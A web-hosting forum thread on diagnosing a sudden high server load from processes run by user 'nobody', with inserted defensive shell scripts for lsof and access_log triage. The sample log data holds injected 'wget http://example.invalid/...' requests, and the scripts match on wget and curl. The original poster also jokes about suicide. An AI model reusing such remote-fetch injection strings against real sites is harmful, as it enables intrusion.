  1. #1
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955

    Horribly High Load

    Hello, my server is currently experiencing a load of 15.

    It used to average 0.00 and 0.01.

    How can I bring the load down? It shows user 'nobody' as using 121.21% CPU load.

    Nothing has changed within the last 3 weeks, and this just started occurring last night.

    Please, can anyone help?

  2. #2
    Join Date
    Jun 2002
    Location
    Portsmouth, VA
    Posts
    161
    You probably got a DoS script or something dropped into your server. I do not know what IT is that you are referring to, but you should run a top and make a note of the pid that is taking all the load. Then use lsof to bring up a list of open files and then kill the process.
    ---
    Jon Berry
    Proactive Server Management
    http://www.got-management.com

  3. #3
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by GOT
    You probably got a DoS script or something dropped into your server. I do not know what IT is that you are referring to, but you should run a top and make a note of the pid that is taking all the load. Then use lsof to bring up a list of open files and then kill the process.
    When I said:

    "It used to average 0.00 and 0.01", I meant the overall server load.

    When I said:
    "It shows user 'nobody' as using 121.21% CPU load.", I meant WHM's "CPU/Memory/MySQL Usage" Server Status page.

  4. #4
    Join Date
    Jun 2002
    Location
    Portsmouth, VA
    Posts
    161
    Understood. You need to identify specifically which process is causing the load. To do that, from shell (ssh) run the top command. It shows the users that own the process and if load is that bad it should be at or near the top. It also shows the pid for the process.

    Once you have the pid, quit top and run

    lsof -p <pid>|more

    You will see a bunch of files but you are specifically looking for something probably in the tmp directory. If you can identify the script itself, then kill the process with:

    kill -9 <pid>

    Then, if you are interested, the forensics begin. Best bet is to install mod_security if you have not already.
    ---
    Jon Berry
    Proactive Server Management
    http://www.got-management.com
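
The triage step described in the post above, as an added example that is not part of the original thread: it reduces lsof output to the entries worth a closer look and records the process details before the process is killed. It uses lsof's `-F` field output rather than the default columns; the sample data, PID 4312 and the list of world-writable directories are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the thread. Parses `lsof -F ftn` output
# (one field per line: p=pid, f=descriptor, t=type, n=name).

# Constructed sample for a hypothetical PID 4312 owned by 'nobody'.
SAMPLE_LSOF='p4312
fcwd
tDIR
n/tmp/.cache-x
ftxt
tREG
n/tmp/.cache-x/httpd (deleted)
fmem
tREG
n/lib/libc-2.3.4.so
f1w
tREG
n/usr/local/apache/logs/error_log
f3u
tIPv4
n192.0.2.10:45112->198.51.100.7:80 (ESTABLISHED)'

# Print "FD<TAB>TYPE<TAB>NAME" for entries under world-writable
# directories (assumed list) or deleted while still open.
suspicious_files() {
    awk '
        /^f/ { fd = substr($0, 2); type = "?"; next }
        /^t/ { type = substr($0, 2); next }
        /^n/ {
            name = substr($0, 2)
            if (name ~ /^\/(tmp|var\/tmp|dev\/shm)(\/|$)/ || name ~ / \(deleted\)$/)
                printf "%s\t%s\t%s\n", fd, type, name
        }'
}

# Live use on Linux: record what the process is before `kill -9`,
# because /proc/<pid> and deleted-but-open files disappear with it.
triage_pid() {
    pid=$1
    echo "exe: $(readlink "/proc/$pid/exe")"
    echo "cwd: $(readlink "/proc/$pid/cwd")"
    echo "cmd: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    lsof -p "$pid" -F ftn | suspicious_files
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_LSOF" | suspicious_files
```

On a live system, `triage_pid <pid> > /root/triage-<pid>.txt` keeps a record that survives the kill.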

  5. #5
    Try going into WHM:

    Try killing the process thru System Health ----> Show current CPU usage; look for the nobody process and kill it.

    Have you tried identifying the source thru
    Server Status ----> Apache Status ?

    Also, did you enable mod_userdir Protection on the server?
    Last edited by webchatsupport; 12-11-2005 at 11:41 PM.

  6. #6
    Check the PID on cpu usage, find the user by looking through your currently running processes, and eliminate either the user or the source of the issue.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  7. #7
    Yeah, it looks like you are running Cpanel, so those steps should be rather easy. Go to system health, find the PID through CPU usage, then run a search on your current running processes to find the user.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  8. #8
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    I've killed all processes being run by user 'nobody', and it's stabilized.

  9. #9
    You may still run into issues once the user starts utilizing whatever script that caused this problem in the first place, again.

    Most likely it was some sort of PHP or CGI mail script using nobody as a sender. You can eliminate this problem in your tweak security settings, however you'll run into a slew of other issues if you already have users doing this in a responsible way.

    I would suggest tracking the person and suspending them until they agree not to do what they were doing.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  10. #10
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    That's a pain in the ***.

  11. #11
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by goodydomains
    You may still run into issues once the user starts utilizing whatever script that caused this problem in the first place, again.

    Most likely it was some sort of PHP or CGI mail script using nobody as a sender. You can eliminate this problem in your tweak security settings, however you'll run into a slew of other issues if you already have users doing this in a responsible way.

    I would suggest tracking the person and suspending them until they agree not to do what they were doing.
    All the people on my server are either family members, or friends.

    I monitor every file that gets put in my server each morning. There's no script utilizing 'nobody' right now but what I have installed, and a few of their forums. And I know their forums aren't utilizing it, and my programs aren't.

    Like I said.

    My server's load used to be around 0.01 and 0.00 all the time. It just happened by some fluke coincidence today, that user 'nobody' decided to be a bitch.

  12. #12
    Ah, I just assumed it was a business server with multiple unknown clients. Hope everything works out with the server from now on.
    FrogJumper.com, Superb Cpanel Web Hosting.
    Excellent, High Paying Affiliate Program.

  13. #13
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by goodydomains
    Ah, I just assumed it was a business server with multiple unknown clients. Hope everything works out with the server from now on.
    Well, it went from 14.31 to 0.01, so I think that's a step in the right direction.

    Thanks everyone for your help.

    Now I'm gonna go look for a Winchester 30/30 to blow my brains out for being such a n00ber.

    Take care, and thanks again.

  14. #14
    Join Date
    Nov 2005
    Location
    BC, Canada
    Posts
    773
    So there were no downloaded scripts that were eating resources? You might want to grep the Apache access_log for "wget" to be on the safe side.
    || Higher Intellect || Half a million documents and climbing.
    || CupidClick Dating || Just for Canadians.
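
The access_log check suggested in the post above, as an added example that is not part of the original thread: a plain grep for "wget" also matches visitors whose User-Agent is Wget, so this version looks only at the request field and reports the client address and HTTP status. It goes slightly beyond the post by also matching "curl"; the log lines are constructed and assume Apache's combined log format.

```shell
#!/usr/bin/env bash
# Added example, not from the thread. Constructed access_log lines in
# Apache combined format (addresses are documentation ranges).
SAMPLE_LOG='192.0.2.15 - - [11/Dec/2005:03:12:44 -0500] "GET /index.php?page=wget%20http://example.invalid/x.txt HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [11/Dec/2005:03:15:02 -0500] "GET /files/report.pdf HTTP/1.0" 200 88211 "-" "Wget/1.10.2"
192.0.2.15 - - [11/Dec/2005:03:16:40 -0500] "GET /index.php?page=WGET+http://example.invalid/y.txt HTTP/1.0" 404 310 "-" "Mozilla/4.0"
203.0.113.4 - - [11/Dec/2005:04:01:10 -0500] "GET /forum/index.php HTTP/1.1" 200 20133 "-" "Mozilla/5.0"'

# Print "CLIENT<TAB>STATUS<TAB>REQUEST" for lines whose request field
# (the first quoted string) mentions wget or curl, in any letter case.
# Splitting on the double quote keeps the User-Agent out of the match.
wget_requests() {
    awk -F'"' '
        tolower($2) ~ /wget|curl/ {
            split($1, pre, " ")     # pre[1]  = client address
            split($3, post, " ")    # post[1] = HTTP status
            printf "%s\t%s\t%s\n", pre[1], post[1], $2
        }'
}

# Keep only the hits the server answered with a 2xx status; those are
# the requests whose target script deserves a review first.
served() {
    awk -F'\t' '$2 ~ /^2/'
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | wget_requests
```

Against a real log, feed the file on stdin, for example `wget_requests < access_log | served`.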

  15. #15
    Join Date
    Dec 2004
    Location
    Southwest Florida
    Posts
    955
    Quote Originally Posted by netfreak
    So there were no downloaded scripts that were eating resources? You might want to grep the Apache access_log for "wget" to be on the safe side.
    I'm positive there isn't any. I'll check, just in case.

    Thanks!
